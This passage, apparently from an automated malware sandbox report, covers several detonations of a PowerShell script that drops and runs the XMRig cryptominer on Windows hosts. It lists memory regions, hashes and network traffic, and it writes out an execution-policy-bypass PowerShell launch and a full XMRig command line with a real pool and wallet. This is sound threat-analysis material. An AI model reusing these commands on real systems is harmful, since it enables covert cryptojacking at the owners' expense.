memory/936-60-0x000001F8317B0000-0x000001F8317D0000-memory.dmp

memory/936-61-0x000001F8317D0000-0x000001F8317F0000-memory.dmp

memory/936-62-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-63-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-64-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-65-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-66-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-67-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-68-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-69-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-70-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-71-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-72-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-73-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-74-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-75-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-76-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-77-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-78-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-79-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-80-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-81-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-82-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-83-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-84-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-85-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-86-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-87-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-88-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-89-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-90-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-91-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-92-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-93-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-94-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-95-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-96-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-97-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-98-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-99-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-100-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-101-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-102-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-103-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-104-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-105-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-106-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-107-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-108-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-109-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-110-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-111-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-112-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-113-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-114-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-115-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-116-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-117-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-118-0x00007FF649000000-0x00007FF649C33000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.99:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 99.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

memory/1800-0-0x00007FFCFA423000-0x00007FFCFA425000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4v1nrpw5.axg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1800-6-0x00000135AC2D0000-0x00000135AC2F2000-memory.dmp

memory/1800-11-0x00007FFCFA420000-0x00007FFCFAEE1000-memory.dmp

memory/1800-12-0x00007FFCFA420000-0x00007FFCFAEE1000-memory.dmp

memory/1800-14-0x00007FFCFA420000-0x00007FFCFAEE1000-memory.dmp

memory/1800-15-0x00000135AC7B0000-0x00000135AC7C2000-memory.dmp

memory/1800-16-0x00000135AC2C0000-0x00000135AC2CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4136-47-0x00000266EAB90000-0x00000266EABB0000-memory.dmp

memory/4136-48-0x00000266EABE0000-0x00000266EAC00000-memory.dmp

memory/4136-49-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-50-0x00000266EAC00000-0x00000266EAC20000-memory.dmp

memory/4136-51-0x00000266EAC20000-0x00000266EAC40000-memory.dmp

memory/4136-52-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/1800-54-0x00007FFCFA420000-0x00007FFCFAEE1000-memory.dmp

memory/1800-53-0x00007FFCFA423000-0x00007FFCFA425000-memory.dmp

memory/1800-55-0x00007FFCFA420000-0x00007FFCFAEE1000-memory.dmp

memory/4136-56-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-57-0x00000266EAC00000-0x00000266EAC20000-memory.dmp

memory/4136-59-0x00000266EAC20000-0x00000266EAC40000-memory.dmp

memory/4136-58-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-60-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-61-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-62-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-63-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-64-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-65-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-66-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-67-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-68-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-69-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-70-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-71-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-72-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-73-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-74-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-75-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-76-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-77-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-78-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-79-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-80-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-81-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-82-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-83-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-84-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-85-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-86-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-87-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-88-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-89-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-90-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-91-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-92-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-93-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-94-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-95-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-96-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-97-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-98-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-99-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-100-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-101-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-102-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-103-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-104-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-105-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-106-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-107-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-108-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-109-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-110-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-111-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-112-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-113-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-114-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-115-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-116-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-117-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-118-0x00007FF604650000-0x00007FF605283000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:47

Platform

win11-20240508-en

Max time kernel

1789s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.22:443 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

memory/3928-0-0x00007FFF21033000-0x00007FFF21035000-memory.dmp

memory/3928-1-0x000001C824B90000-0x000001C824BB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgyzt5ak.r3i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3928-10-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3928-11-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3928-12-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3928-14-0x000001C83D070000-0x000001C83D082000-memory.dmp

memory/3928-15-0x000001C83D060000-0x000001C83D06A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1212-46-0x0000018464AD0000-0x0000018464AF0000-memory.dmp

memory/1212-47-0x0000018464B20000-0x0000018464B40000-memory.dmp

memory/1212-48-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/3928-49-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/1212-51-0x0000018464B60000-0x0000018464B80000-memory.dmp

memory/1212-50-0x0000018464B40000-0x0000018464B60000-memory.dmp

memory/1212-52-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/3928-53-0x00007FFF21033000-0x00007FFF21035000-memory.dmp

memory/1212-54-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-55-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-56-0x0000018464B40000-0x0000018464B60000-memory.dmp

memory/1212-57-0x0000018464B60000-0x0000018464B80000-memory.dmp

memory/1212-58-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-59-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-60-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-61-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-62-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-63-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-64-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-65-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-66-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-67-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-68-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-69-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-70-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-71-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-72-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-73-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-74-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-75-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-76-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-77-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-78-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-79-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-80-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-81-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-82-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-83-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-84-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-85-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-86-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-87-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-88-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-89-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-90-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-91-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-92-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-93-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-94-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-95-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-96-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-97-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-98-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-99-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-100-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-101-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-102-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-103-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-104-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-105-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-106-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-107-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-108-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-109-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-110-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-111-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-112-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-113-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-114-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-115-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-116-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:23

Platform

win10-20240404-en

Max time kernel

1795s

Max time network

1804s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
